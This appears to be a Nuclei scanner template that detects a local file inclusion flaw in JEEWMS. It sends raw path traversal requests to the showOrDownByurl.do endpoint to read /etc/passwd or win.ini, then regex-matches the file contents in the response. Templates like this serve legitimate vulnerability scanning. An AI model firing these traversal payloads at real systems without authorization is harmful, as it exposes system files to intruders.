id: jeewms-lfi

info:
  name: JEEWMS LFI
  author: pikpikcu
  severity: high
  reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
  tags: jeewms,lfi

requests:
  - raw:
      - | #linux
        GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - | #windows
        GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body

      - type: status
        status:
          - 200
